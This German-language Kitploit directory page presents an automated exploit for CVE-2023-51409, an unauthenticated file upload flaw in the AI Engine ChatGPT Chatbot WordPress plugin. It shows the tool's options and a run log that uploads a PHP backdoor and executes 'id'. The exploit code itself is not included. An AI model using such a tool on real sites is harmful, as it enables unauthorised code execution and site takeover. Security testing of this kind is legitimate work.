Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/nxploited/cve-2023-51409
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubnxploited/cve-2023-51409

CVE-2023-51409

Automatisierter Exploit für CVE-2023-51409, eine nicht authentifizierte Schwachstelle zum beliebigen Hochladen von Dateien im WordPress-Plugin AI Engine ChatGPT Chatbot, die die Bereitstellung eines PHP-Backdoors ermöglicht.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-51409

AI Engine: ChatGPT Chatbot <= 1.9.98 - Nicht authentifizierter Datei-Upload über rest_upload

Beschreibung

Dies könnte einem Angreifer ermöglichen, beliebige Dateien auf Ihre Website hochzuladen. Dies kann Hintertüren umfassen, die dann ausgeführt werden, um weiteren Zugriff auf Ihre Website zu erlangen.

Verwendung:

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress instance.
  -code PHP_CODE, --php_code PHP_CODE
  PHP code to upload (default, id).

Das Ergebnis

root@kitploit:~
[INFO] Initiating version check for target.
[INFO] Target plugin version detected: 1.9.98
[VULNERABLE] Detected vulnerable plugin version. Proceeding with exploitation.
[INFO] Target is vulnerable. Proceeding with file upload.
[INFO] Attempting to upload file: Nxploit.php to endpoint: http://192.168.100.74:888/wordpress/wp-json/mwai-ui/v1/files/upload
[SUCCESS] File uploaded successfully! Accessible at: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
[INFO] Exploitation complete. Uploaded file URL: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php

Standard-PHP-Code

root@kitploit:~
id 
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Tool herunterladen